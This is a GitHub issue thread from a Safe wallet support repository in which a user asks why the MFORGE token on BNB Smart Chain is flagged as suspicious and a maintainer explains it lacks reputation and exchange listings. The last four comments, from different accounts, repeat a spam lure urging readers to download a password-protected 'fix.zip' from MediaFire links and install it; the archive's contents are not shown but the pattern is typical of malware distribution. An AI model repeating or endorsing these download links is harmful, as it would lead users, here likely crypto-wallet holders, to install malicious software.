### ISSUE TITLE
[BNB] Legit token (MFORGE) marked as suspicious/spam on the UI

### ISSUE THREAD

**Issue by Claire-serveth** [5afe/safe-support#508]
### Issue Category

Other

### What happened?

MFORGE token is classified/marked as suspicious token on the UI. What is/are the necessary action/s in order for this token be classified as trusted?
![image](https://github.com/user-attachments/assets/0cc7f66d-bf0f-47d8-a58f-ca98ef1cd4fd)

### Date and time this happened or you first noticed this issue

26-08-2024

### Network

Binance Smart Chain

### Safe Address

bnb:0xBF69c4ecB7818Ae914cA0A7392D542FfA7399818

### Token Address

0x8437100eD18dbea089e0FA3CaAae7f6f40e4A05C

### Token Type

ERC20

**Comment by JagoFigueroa** [comment]
Hello! I have talked with the team and unfortunately we see a few issues that prevent us from marking it as trusted in our service.

The [token](https://bscscan.com/token/0x8437100eD18dbea089e0FA3CaAae7f6f40e4A05C) has no reputation in the bsc explorer for example:

![Screenshot 2024-08-26 at 14 12 08](https://github.com/user-attachments/assets/c3714e9b-8631-46ba-93eb-e651472862b5)

and has no presence in any of the major exchanges on this chain like 1inch, pancakeswap or uniswap.

As we cannot verify how legit it is, marking it as trusted could have some major security risks for us. 

Cheers!

**Comment by Claire-serveth** [comment]
According to the user, the token is already trading on pancakeswap, but I'll relay this to the user especially regarding the reputation on BSC explorer. Thank you so much @JagoFigueroa 🙏 I'll go ahead and close this issue now.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
